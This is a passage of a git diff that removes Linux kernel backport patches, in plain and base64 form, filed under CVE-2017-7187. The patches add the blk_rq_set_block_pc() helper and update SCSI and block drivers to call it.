-index 20c4557..0439652 100644
---- a/drivers/scsi/device_handler/scsi_dh_rdac.c
-+++ b/drivers/scsi/device_handler/scsi_dh_rdac.c
-@@ -279,6 +279,7 @@
- 				"get_rdac_req: blk_get_request failed.\n");
- 		return NULL;
- 	}
-+	blk_rq_set_block_pc(rq);
- 
- 	if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) {
- 		blk_put_request(rq);
-@@ -287,7 +288,6 @@
- 		return NULL;
- 	}
- 
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			 REQ_FAILFAST_DRIVER;
- 	rq->retries = RDAC_RETRIES;
-diff --git a/drivers/scsi/osd/osd_initiator.c b/drivers/scsi/osd/osd_initiator.c
-index c06b8e5..9ad3ac7 100644
---- a/drivers/scsi/osd/osd_initiator.c
-+++ b/drivers/scsi/osd/osd_initiator.c
-@@ -1566,6 +1566,7 @@
- 		if (unlikely(!req))
- 			return ERR_PTR(-ENOMEM);
- 
-+		blk_rq_set_block_pc(req);
- 		return req;
- 	}
- }
-@@ -1586,7 +1587,6 @@
- 	}
- 
- 	or->request = req;
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->cmd_flags |= REQ_QUIET;
- 
- 	req->timeout = or->timeout;
-@@ -1604,7 +1604,7 @@
- 				ret = PTR_ERR(req);
- 				goto out;
- 			}
--			req->cmd_type = REQ_TYPE_BLOCK_PC;
-+			blk_rq_set_block_pc(req);
- 			or->in.req = or->request->next_rq = req;
- 		}
- 	} else if (has_in)
-diff --git a/drivers/scsi/osst.c b/drivers/scsi/osst.c
-index 21883a2..0727ea7 100644
---- a/drivers/scsi/osst.c
-+++ b/drivers/scsi/osst.c
-@@ -365,7 +365,7 @@
- 	if (!req)
- 		return DRIVER_ERROR << 24;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_QUIET;
- 
- 	SRpnt->bio = NULL;
-diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
-index 386f0c5..d4c31d4 100644
---- a/drivers/scsi/scsi_error.c
-+++ b/drivers/scsi/scsi_error.c
-@@ -1624,6 +1624,8 @@
- 	 */
- 	req = blk_get_request(sdev->request_queue, READ, GFP_KERNEL);
- 
-+	blk_rq_set_block_pc(req);
-+
- 	req->cmd[0] = ALLOW_MEDIUM_REMOVAL;
- 	req->cmd[1] = 0;
- 	req->cmd[2] = 0;
-@@ -1633,7 +1635,6 @@
- 
- 	req->cmd_len = COMMAND_SIZE(req->cmd[0]);
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->cmd_flags |= REQ_QUIET;
- 	req->timeout = 10 * HZ;
- 	req->retries = 5;
-diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
-index 5dfd749..725b405 100644
---- a/drivers/scsi/scsi_lib.c
-+++ b/drivers/scsi/scsi_lib.c
-@@ -217,6 +217,7 @@
- 	req = blk_get_request(sdev->request_queue, write, __GFP_WAIT);
- 	if (!req)
- 		return ret;
-+	blk_rq_set_block_pc(req);
- 
- 	if (bufflen &&	blk_rq_map_kern(sdev->request_queue, req,
- 					buffer, bufflen, __GFP_WAIT))
-@@ -228,7 +229,6 @@
- 	req->sense_len = 0;
- 	req->retries = retries;
- 	req->timeout = timeout;
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->cmd_flags |= flags | REQ_QUIET | REQ_PREEMPT;
- 
- 	/*
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 3ec5b33..216d31f 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1655,10 +1655,9 @@
- 	if (!rq)
- 		return -ENOMEM;
- 
-+	blk_rq_set_block_pc(rq);
- 	memcpy(rq->cmd, cmd, hp->cmd_len);
--
- 	rq->cmd_len = hp->cmd_len;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 
- 	srp->rq = rq;
- 	rq->end_io_data = srp;
-diff --git a/drivers/scsi/st.c b/drivers/scsi/st.c
-index e41998c..08ad530 100644
---- a/drivers/scsi/st.c
-+++ b/drivers/scsi/st.c
-@@ -488,7 +488,7 @@
- 	if (!req)
- 		return DRIVER_ERROR << 24;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_QUIET;
- 
- 	mdata->null_mapped = 1;
-diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c
-index 94c905f..d28f8d1 100644
---- a/drivers/target/target_core_pscsi.c
-+++ b/drivers/target/target_core_pscsi.c
-@@ -1083,6 +1083,8 @@
- 				TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
- 			return -ENODEV;
- 		}
-+
-+		blk_rq_set_block_pc(req);
- 	} else {
- 		BUG_ON(!task->task_size);
- 
-@@ -1104,7 +1106,6 @@
- 		}
- 	}
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->end_io = pscsi_req_done;
- 	req->end_io_data = task;
- 	req->cmd_len = scsi_command_size(pt->pscsi_cdb);
-diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
-index 21dc2aa..f37d1f0 100644
---- a/include/linux/blkdev.h
-+++ b/include/linux/blkdev.h
-@@ -675,6 +675,7 @@
- extern struct request *blk_get_request(struct request_queue *, int, gfp_t);
- extern struct request *blk_make_request(struct request_queue *, struct bio *,
- 					gfp_t);
-+extern void blk_rq_set_block_pc(struct request *);
- extern void blk_requeue_request(struct request_queue *, struct request *);
- extern int blk_reinsert_request(struct request_queue *q, struct request *rq);
- extern bool blk_reinsert_req_sup(struct request_queue *q);
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch.base64
deleted file mode 100644
index a3326fea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAxZjA4NDM1OTE3MDNjM2Q2NjRhMjM2ZTJkM2E3YTg1NWZhOTQ1MWQ2IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBKZW5zIEF4Ym9lIDxheGJvZUBmYi5jb20+CkRhdGU6IEZyaSwgMDYgSnVuIDIwMTQgMDc6NTc6MzcgLTA2MDAKU3ViamVjdDogW1BBVENIXSBCQUNLUE9SVDogYmxvY2s6IGFkZCBibGtfcnFfc2V0X2Jsb2NrX3BjKCkKCldpdGggdGhlIG9wdGltaXphdGlvbnMgYXJvdW5kIG5vdCBjbGVhcmluZyB0aGUgZnVsbCByZXF1ZXN0IGF0IGFsbG9jCnRpbWUsIHdlIGFyZSBsZWF2aW5nIHNvbWUgb2YgdGhlIG5lZWRlZCBpbml0IGZvciBSRVFfVFlQRV9CTE9DS19QQwp1cCB0byB0aGUgdXNlciBhbGxvY2F0aW5nIHRoZSByZXF1ZXN0LgoKQWRkIGEgYmxrX3JxX3NldF9ibG9ja19wYygpIHRoYXQgc2V0cyB0aGUgY29tbWFuZCB0eXBlIHRvClJFUV9UWVBFX0JMT0NLX1BDLCBhbmQgcHJvcGVybHkgaW5pdGlhbGl6ZXMgdGhlIG1lbWJlcnMgYXNzb2NpYXRlZAp3aXRoIHRoaXMgdHlwZSBvZiByZXF1ZXN0LiBVcGRhdGUgY2FsbGVycyB0byB1c2UgdGhpcyBmdW5jdGlvbiBpbnN0ZWFkCm9mIG1hbmlwdWxhdGluZyBycS0+Y21kX3R5cGUgZGlyZWN0bHkuCgpJbmNsdWRlcyBmaXhlcyBmcm9tIENocmlzdG9waCBIZWxsd2lnIDxoY2hAbHN0LmRlPiBmb3IgbXkgaGFsZi1hc3NlZAphdHRlbXB0LgoKQ2hhbmdlLUlkOiBJZmMzODZkZmI5NTFjNWQ2YWRlYmY0OGZmMzgxMzVkZGEyOGU0YjFjZQpTaWduZWQtb2ZmLWJ5OiBKZW5zIEF4Ym9lIDxheGJvZUBmYi5jb20+Ci0tLQoKZGlmZiAtLWdpdCBhL2Jsb2NrL2Jsay1jb3JlLmMgYi9ibG9jay9ibGstY29yZS5jCmluZGV4IGViMGVjNjAuLmM3Zjc2MzcgMTAwNjQ0Ci0tLSBhL2Jsb2NrL2Jsay1jb3JlLmMKKysrIGIvYmxvY2svYmxrLWNvcmUuYwpAQCAtMTA0Myw2ICsxMDQzLDggQEAKIAlpZiAodW5saWtlbHkoIXJxKSkKIAkJcmV0dXJuIEVSUl9QVFIoLUVOT01FTSk7CiAKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKKwogCWZvcl9lYWNoX2JpbyhiaW8pIHsKIAkJc3RydWN0IGJpbyAqYm91bmNlX2JpbyA9IGJpbzsKIAkJaW50IHJldDsKQEAgLTEwNjAsNiArMTA2MiwyMiBAQAogRVhQT1JUX1NZTUJPTChibGtfbWFrZV9yZXF1ZXN0KTsKIAogLyoqCisgKiBibGtfcnFfc2V0X2Jsb2NrX3BjIC0gaW5pdGlhbGl6ZSBhIHJlcXVlZXN0IHRvIHR5cGUgQkxPQ0tfUEMKKyAqIEBycToJCXJlcXVlc3QgdG8gYmUgaW5pdGlhbGl6ZWQKKyAqCisgKi8KK3ZvaWQgYmxrX3JxX3NldF9ibG9ja19wYyhzdHJ1Y3QgcmVxdWVzdCAqcnEpCit7CisJcnEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CisJcnEtPl9fZGF0YV9sZW4gPSAwOworCXJxLT5fX3NlY3RvciA9IChzZWN0b3JfdCkgLTE7CisJcnEtPmJpbyA9IHJxLT5iaW90YWlsID0gTlVMTDsKKwltZW1zZXQocnEtPl9fY21kLCAwLCBzaXplb2YocnEtPl9fY21kKSk7CisJcnEtPmNtZCA9IHJxLT5fX2NtZDsKK30KK0VYUE9SVF9TWU1CT0woYmxrX3JxX3NldF9ibG9ja19wYyk7CisKKy8qKgogICogYmxrX3JlcXVldWVfcmVxdWVzdCAtIHB1dCBhIHJlcXVlc3QgYmFjayBvbiBxdWV1ZQogICogQHE6CQlyZXF1ZXN0IHF1ZXVlIHdoZXJlIHJlcXVlc3Qgc2hvdWxkIGJlIGluc2VydGVkCiAgKiBAcnE6CQlyZXF1ZXN0IHRvIGJlIGluc2VydGVkCmRpZmYgLS1naXQgYS9ibG9jay9ic2cuYyBiL2Jsb2NrL2JzZy5jCmluZGV4IGIxYzFkNTQuLjhjNzUwZDUgMTAwNjQ0Ci0tLSBhL2Jsb2NrL2JzZy5jCisrKyBiL2Jsb2NrL2JzZy5jCkBAIC0xOTYsNyArMTk2LDYgQEAKIAkgKiBmaWxsIGluIHJlcXVlc3Qgc3RydWN0dXJlCiAJICovCiAJcnEtPmNtZF9sZW4gPSBoZHItPnJlcXVlc3RfbGVuOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCiAJcnEtPnRpbWVvdXQgPSBtc2Vjc190b19qaWZmaWVzKGhkci0+dGltZW91dCk7CiAJaWYgKCFycS0+dGltZW91dCkKQEAgLTI3Myw2ICsyNzIsOCBAQAogCXJxID0gYmxrX2dldF9yZXF1ZXN0KHEsIHJ3LCBHRlBfS0VSTkVMKTsKIAlpZiAoIXJxKQogCQlyZXR1cm4gRVJSX1BUUigtRU5PTUVNKTsKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKKwogCXJldCA9IGJsa19maWxsX3NndjRfaGRyX3JxKHEsIHJxLCBoZHIsIGJkLCBoYXNfd3JpdGVfcGVybSk7CiAJaWYgKHJldCkKIAkJZ290byBvdXQ7CmRpZmYgLS1naXQgYS9ibG9jay9zY3NpX2lvY3RsLmMgYi9ibG9jay9zY3NpX2lvY3RsLmMKaW5kZXggMjYwZmE4MC4uNDExOGE4MSAxMDA2NDQKLS0tIGEvYmxvY2svc2NzaV9pb2N0bC5jCisrKyBiL2Jsb2NrL3Njc2lfaW9jdGwuYwpAQCAtMjMyLDcgKzIzMiw2IEBACiAJICogZmlsbCBpbiByZXF1ZXN0IHN0cnVjdHVyZQogCSAqLwogCXJxLT5jbWRfbGVuID0gaGRyLT5jbWRfbGVuOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCiAJcnEtPnRpbWVvdXQgPSBtc2Vjc190b19qaWZmaWVzKGhkci0+dGltZW91dCk7CiAJaWYgKCFycS0+dGltZW91dCkKQEAgLTMxMyw2ICszMTIsNyBAQAogCXJxID0gYmxrX2dldF9yZXF1ZXN0KHEsIHdyaXRpbmcgPyBXUklURSA6IFJFQUQsIEdGUF9LRVJORUwpOwogCWlmICghcnEpCiAJCXJldHVybiAtRU5PTUVNOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJaWYgKGJsa19maWxsX3NnaGRyX3JxKHEsIHJxLCBoZHIsIG1vZGUpKSB7CiAJCWJsa19wdXRfcmVxdWVzdChycSk7CkBAIC01MTEsNyArNTExLDcgQEAKIAltZW1zZXQoc2Vuc2UsIDAsIHNpemVvZihzZW5zZSkpOwogCXJxLT5zZW5zZSA9IHNlbnNlOwogCXJxLT5zZW5zZV9sZW4gPSAwOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJYmxrX2V4ZWN1dGVfcnEocSwgZGlzaywgcnEsIDApOwogCkBAIC01NDQsNyArNTQ0LDcgQEAKIAlpbnQgZXJyOwogCiAJcnEgPSBibGtfZ2V0X3JlcXVlc3QocSwgV1JJVEUsIF9fR0ZQX1dBSVQpOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCXJxLT50aW1lb3V0ID0gQkxLX0RFRkFVTFRfU0dfVElNRU9VVDsKIAlycS0+Y21kWzBdID0gY21kOwogCXJxLT5jbWRbNF0gPSBkYXRhOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9ibG9jay9wa3RjZHZkLmMgYi9kcml2ZXJzL2Jsb2NrL3BrdGNkdmQuYwppbmRleCBiYTY2ZTQ0Li4zOWZmZTljIDEwMDY0NAotLS0gYS9kcml2ZXJzL2Jsb2NrL3BrdGNkdmQuYworKysgYi9kcml2ZXJzL2Jsb2NrL3BrdGNkdmQuYwpAQCAtNzQyLDYgKzc0Miw3IEBACiAKIAlycSA9IGJsa19nZXRfcmVxdWVzdChxLCAoY2djLT5kYXRhX2RpcmVjdGlvbiA9PSBDR0NfREFUQV9XUklURSkgPwogCQkJICAgICBXUklURSA6IFJFQUQsIF9fR0ZQX1dBSVQpOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJaWYgKGNnYy0+YnVmbGVuKSB7CiAJCWlmIChibGtfcnFfbWFwX2tlcm4ocSwgcnEsIGNnYy0+YnVmZmVyLCBjZ2MtPmJ1ZmxlbiwgX19HRlBfV0FJVCkpCkBAIC03NTIsNyArNzUzLDYgQEAKIAltZW1jcHkocnEtPmNtZCwgY2djLT5jbWQsIENEUk9NX1BBQ0tFVF9TSVpFKTsKIAogCXJxLT50aW1lb3V0ID0gNjAqSFo7Ci0JcnEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CiAJaWYgKGNnYy0+cXVpZXQpCiAJCXJxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCmRpZmYgLS1naXQgYS9kcml2ZXJzL2Nkcm9tL2Nkcm9tLmMgYi9kcml2ZXJzL2Nkcm9tL2Nkcm9tLmMKaW5kZXggZDYyMGI0NC4uN2FiNTI4ZCAxMDA2NDQKLS0tIGEvZHJpdmVycy9jZHJvbS9jZHJvbS5jCisrKyBiL2RyaXZlcnMvY2Ryb20vY2Ryb20uYwpAQCAtMjE2NSw2ICsyMTY1LDcgQEAKIAkJCXJldCA9IC1FTk9NRU07CiAJCQlicmVhazsKIAkJfQorCQlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKIAogCQlyZXQgPSBibGtfcnFfbWFwX3VzZXIocSwgcnEsIE5VTEwsIHVidWYsIGxlbiwgR0ZQX0tFUk5FTCk7CiAJCWlmIChyZXQpIHsKQEAgLTIxODQsNyArMjE4NSw2IEBACiAJCXJxLT5jbWRbOV0gPSAweGY4OwogCiAJCXJxLT5jbWRfbGVuID0gMTI7Ci0JCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCQlycS0+dGltZW91dCA9IDYwICogSFo7CiAJCWJpbyA9IHJxLT5iaW87CiAKZGlmZiAtLWdpdCBhL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX2FsdWEuYyBiL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX2FsdWEuYwppbmRleCAwNGM1Y2VhLi4zNmZiNjhjIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9hbHVhLmMKKysrIGIvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfYWx1YS5jCkBAIC0xMTEsNiArMTExLDcgQEAKIAkJCSAgICAiJXM6IGJsa19nZXRfcmVxdWVzdCBmYWlsZWRcbiIsIF9fZnVuY19fKTsKIAkJcmV0dXJuIE5VTEw7CiAJfQorCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJaWYgKGJ1ZmxlbiAmJiBibGtfcnFfbWFwX2tlcm4ocSwgcnEsIGJ1ZmZlciwgYnVmbGVuLCBHRlBfTk9JTykpIHsKIAkJYmxrX3B1dF9yZXF1ZXN0KHJxKTsKQEAgLTExOSw3ICsxMjAsNiBAQAogCQlyZXR1cm4gTlVMTDsKIAl9CiAKLQlycS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKIAlycS0+Y21kX2ZsYWdzIHw9IFJFUV9GQUlMRkFTVF9ERVYgfCBSRVFfRkFJTEZBU1RfVFJBTlNQT1JUIHwKIAkJCSBSRVFfRkFJTEZBU1RfRFJJVkVSOwogCXJxLT5yZXRyaWVzID0gQUxVQV9GQUlMT1ZFUl9SRVRSSUVTOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfZW1jLmMgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9lbWMuYwppbmRleCBlMWM4YmUwLi42ZjA3ZjdmIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9lbWMuYworKysgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9lbWMuYwpAQCAtMjgwLDYgKzI4MCw3IEBACiAJCXJldHVybiBOVUxMOwogCX0KIAorCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCXJxLT5jbWRfbGVuID0gQ09NTUFORF9TSVpFKGNtZCk7CiAJcnEtPmNtZFswXSA9IGNtZDsKIApAQCAtMzA0LDcgKzMwNSw2IEBACiAJCWJyZWFrOwogCX0KIAotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJxLT5jbWRfZmxhZ3MgfD0gUkVRX0ZBSUxGQVNUX0RFViB8IFJFUV9GQUlMRkFTVF9UUkFOU1BPUlQgfAogCQkJIFJFUV9GQUlMRkFTVF9EUklWRVI7CiAJcnEtPnRpbWVvdXQgPSBDTEFSSUlPTl9USU1FT1VUOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfaHBfc3cuYyBiL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX2hwX3N3LmMKaW5kZXggMDg0MDYyYi4uZTlkOWZlYSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfaHBfc3cuYworKysgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9ocF9zdy5jCkBAIC0xMjAsNyArMTIwLDcgQEAKIAlpZiAoIXJlcSkKIAkJcmV0dXJuIFNDU0lfREhfUkVTX1RFTVBfVU5BVkFJTDsKIAotCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX0ZBSUxGQVNUX0RFViB8IFJFUV9GQUlMRkFTVF9UUkFOU1BPUlQgfAogCQkJICBSRVFfRkFJTEZBU1RfRFJJVkVSOwogCXJlcS0+Y21kX2xlbiA9IENPTU1BTkRfU0laRShURVNUX1VOSVRfUkVBRFkpOwpAQCAtMjUwLDcgKzI1MCw3IEBACiAJaWYgKCFyZXEpCiAJCXJldHVybiBTQ1NJX0RIX1JFU19URU1QX1VOQVZBSUw7CiAKLQlyZXEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CisJYmxrX3JxX3NldF9ibG9ja19wYyhyZXEpOwogCXJlcS0+Y21kX2ZsYWdzIHw9IFJFUV9GQUlMRkFTVF9ERVYgfCBSRVFfRkFJTEZBU1RfVFJBTlNQT1JUIHwKIAkJCSAgUkVRX0ZBSUxGQVNUX0RSSVZFUjsKIAlyZXEtPmNtZF9sZW4gPSBDT01NQU5EX1NJWkUoU1RBUlRfU1RPUCk7CmRpZmYgLS1naXQgYS9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9yZGFjLmMgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9yZGFjLmMKaW5kZXggMjBjNDU1Ny4uMDQzOTY1MiAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfcmRhYy5jCisrKyBiL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX3JkYWMuYwpAQCAtMjc5LDYgKzI3OSw3IEBACiAJCQkJImdldF9yZGFjX3JlcTogYmxrX2dldF9yZXF1ZXN0IGZhaWxlZC5cbiIpOwogCQlyZXR1cm4gTlVMTDsKIAl9CisJYmxrX3JxX3NldF9ibG9ja19wYyhycSk7CiAKIAlpZiAoYnVmbGVuICYmIGJsa19ycV9tYXBfa2VybihxLCBycSwgYnVmZmVyLCBidWZsZW4sIEdGUF9OT0lPKSkgewogCQlibGtfcHV0X3JlcXVlc3QocnEpOwpAQCAtMjg3LDcgKzI4OCw2IEBACiAJCXJldHVybiBOVUxMOwogCX0KIAotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJxLT5jbWRfZmxhZ3MgfD0gUkVRX0ZBSUxGQVNUX0RFViB8IFJFUV9GQUlMRkFTVF9UUkFOU1BPUlQgfAogCQkJIFJFUV9GQUlMRkFTVF9EUklWRVI7CiAJcnEtPnJldHJpZXMgPSBSREFDX1JFVFJJRVM7CmRpZmYgLS1naXQgYS9kcml2ZXJzL3Njc2kvb3NkL29zZF9pbml0aWF0b3IuYyBiL2RyaXZlcnMvc2NzaS9vc2Qvb3NkX2luaXRpYXRvci5jCmluZGV4IGMwNmI4ZTUuLjlhZDNhYzcgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvc2NzaS9vc2Qvb3NkX2luaXRpYXRvci5jCisrKyBiL2RyaXZlcnMvc2NzaS9vc2Qvb3NkX2luaXRpYXRvci5jCkBAIC0xNTY2LDYgKzE1NjYsNyBAQAogCQlpZiAodW5saWtlbHkoIXJlcSkpCiAJCQlyZXR1cm4gRVJSX1BUUigtRU5PTUVNKTsKIAorCQlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJCXJldHVybiByZXE7CiAJfQogfQpAQCAtMTU4Niw3ICsxNTg3LDYgQEAKIAl9CiAKIAlvci0+cmVxdWVzdCA9IHJlcTsKLQlyZXEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCiAJcmVxLT50aW1lb3V0ID0gb3ItPnRpbWVvdXQ7CkBAIC0xNjA0LDcgKzE2MDQsNyBAQAogCQkJCXJldCA9IFBUUl9FUlIocmVxKTsKIAkJCQlnb3RvIG91dDsKIAkJCX0KLQkJCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKKwkJCWJsa19ycV9zZXRfYmxvY2tfcGMocmVxKTsKIAkJCW9yLT5pbi5yZXEgPSBvci0+cmVxdWVzdC0+bmV4dF9ycSA9IHJlcTsKIAkJfQogCX0gZWxzZSBpZiAoaGFzX2luKQpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL29zc3QuYyBiL2RyaXZlcnMvc2NzaS9vc3N0LmMKaW5kZXggMjE4ODNhMi4uMDcyN2VhNyAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL29zc3QuYworKysgYi9kcml2ZXJzL3Njc2kvb3NzdC5jCkBAIC0zNjUsNyArMzY1LDcgQEAKIAlpZiAoIXJlcSkKIAkJcmV0dXJuIERSSVZFUl9FUlJPUiA8PCAyNDsKIAotCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCiAJU1JwbnQtPmJpbyA9IE5VTEw7CmRpZmYgLS1naXQgYS9kcml2ZXJzL3Njc2kvc2NzaV9lcnJvci5jIGIvZHJpdmVycy9zY3NpL3Njc2lfZXJyb3IuYwppbmRleCAzODZmMGM1Li5kNGMzMWQ0IDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2NzaV9lcnJvci5jCisrKyBiL2RyaXZlcnMvc2NzaS9zY3NpX2Vycm9yLmMKQEAgLTE2MjQsNiArMTYyNCw4IEBACiAJICovCiAJcmVxID0gYmxrX2dldF9yZXF1ZXN0KHNkZXYtPnJlcXVlc3RfcXVldWUsIFJFQUQsIEdGUF9LRVJORUwpOwogCisJYmxrX3JxX3NldF9ibG9ja19wYyhyZXEpOworCiAJcmVxLT5jbWRbMF0gPSBBTExPV19NRURJVU1fUkVNT1ZBTDsKIAlyZXEtPmNtZFsxXSA9IDA7CiAJcmVxLT5jbWRbMl0gPSAwOwpAQCAtMTYzMyw3ICsxNjM1LDYgQEAKIAogCXJlcS0+Y21kX2xlbiA9IENPTU1BTkRfU0laRShyZXEtPmNtZFswXSk7CiAKLQlyZXEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCXJlcS0+dGltZW91dCA9IDEwICogSFo7CiAJcmVxLT5yZXRyaWVzID0gNTsKZGlmZiAtLWdpdCBhL2RyaXZlcnMvc2NzaS9zY3NpX2xpYi5jIGIvZHJpdmVycy9zY3NpL3Njc2lfbGliLmMKaW5kZXggNWRmZDc0OS4uNzI1YjQwNSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL3Njc2lfbGliLmMKKysrIGIvZHJpdmVycy9zY3NpL3Njc2lfbGliLmMKQEAgLTIxNyw2ICsyMTcsNyBAQAogCXJlcSA9IGJsa19nZXRfcmVxdWVzdChzZGV2LT5yZXF1ZXN0X3F1ZXVlLCB3cml0ZSwgX19HRlBfV0FJVCk7CiAJaWYgKCFyZXEpCiAJCXJldHVybiByZXQ7CisJYmxrX3JxX3NldF9ibG9ja19wYyhyZXEpOwogCiAJaWYgKGJ1ZmZsZW4gJiYJYmxrX3JxX21hcF9rZXJuKHNkZXYtPnJlcXVlc3RfcXVldWUsIHJlcSwKIAkJCQkJYnVmZmVyLCBidWZmbGVuLCBfX0dGUF9XQUlUKSkKQEAgLTIyOCw3ICsyMjksNiBAQAogCXJlcS0+c2Vuc2VfbGVuID0gMDsKIAlyZXEtPnJldHJpZXMgPSByZXRyaWVzOwogCXJlcS0+dGltZW91dCA9IHRpbWVvdXQ7Ci0JcmVxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJlcS0+Y21kX2ZsYWdzIHw9IGZsYWdzIHwgUkVRX1FVSUVUIHwgUkVRX1BSRUVNUFQ7CiAKIAkvKgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCAzZWM1YjMzLi4yMTZkMzFmIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtMTY1NSwxMCArMTY1NSw5IEBACiAJaWYgKCFycSkKIAkJcmV0dXJuIC1FTk9NRU07CiAKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKIAltZW1jcHkocnEtPmNtZCwgY21kLCBocC0+Y21kX2xlbik7Ci0KIAlycS0+Y21kX2xlbiA9IGhwLT5jbWRfbGVuOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOw